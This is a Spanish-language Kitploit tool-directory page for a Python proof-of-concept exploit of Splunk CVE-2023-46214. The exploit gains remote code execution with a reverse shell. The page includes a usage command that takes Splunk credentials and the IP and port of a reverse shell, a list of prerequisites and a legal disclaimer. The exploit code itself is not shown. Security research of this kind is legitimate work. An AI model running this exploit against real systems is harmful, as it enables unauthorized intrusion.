Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Splunk-RCE-poc — PoC en Python para CVE-2023-46214 que explota la función adddatamethods de Splunk para lograr ejecución remota de código a través de una shell inversa. | Kitploit
Herramientas/GitHubGitHub/nathan31337/splunk-rce-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubnathan31337/splunk-rce-poc

Splunk-RCE-poc

PoC en Python para CVE-2023-46214 que explota la función adddatamethods de Splunk para lograr ejecución remota de código a través de una shell inversa.

Ver Repositorio
11423hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Splunk RCE - PoC

Exploit de prueba de concepto para CVE-2023-46214, SVD-2023-1104

poc

Uso

La URL de la instancia de Splunk, el nombre de usuario, la contraseña, la IP del shell inverso y el puerto son todos necesarios como parámetros de línea de comandos. Por ejemplo:

root@kitploit:~
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>

Requisitos previos

  • Credenciales de Splunk con permiso de carga para adddatamethods
    • Nota: puede que exista otro vector, esto es solo lo que usé
  • Splunk no se está ejecutando en modo SHC

Análisis

He escrito una entrada de blog que detalla la metodología utilizada para descubrir esta vulnerabilidad. Si tienes algún problema con el script, el blog puede ser útil, ya que detalla los pasos manuales para la explotación.

Análisis de CVE-2023-46214 + PoC

Aviso legal

El script de prueba de concepto (PoC) proporcionado en este repositorio sirve únicamente para fines educativos y de investigación. Su propósito es mostrar una vulnerabilidad específica y ayudar a comprender los riesgos de seguridad asociados.

Cualquier uso de este script para actividades no autorizadas, incluyendo, entre otros, el acceso no autorizado a sistemas, pruebas no autorizadas u otras formas de uso indebido, está terminantemente prohibido.

Los creadores y colaboradores de este repositorio rechazan toda responsabilidad por el uso indebido o cualquier daño o perjuicio resultante del uso de este script. Al utilizar este script, consientes usarlo de manera responsable y bajo tu propio riesgo.

Descargar herramienta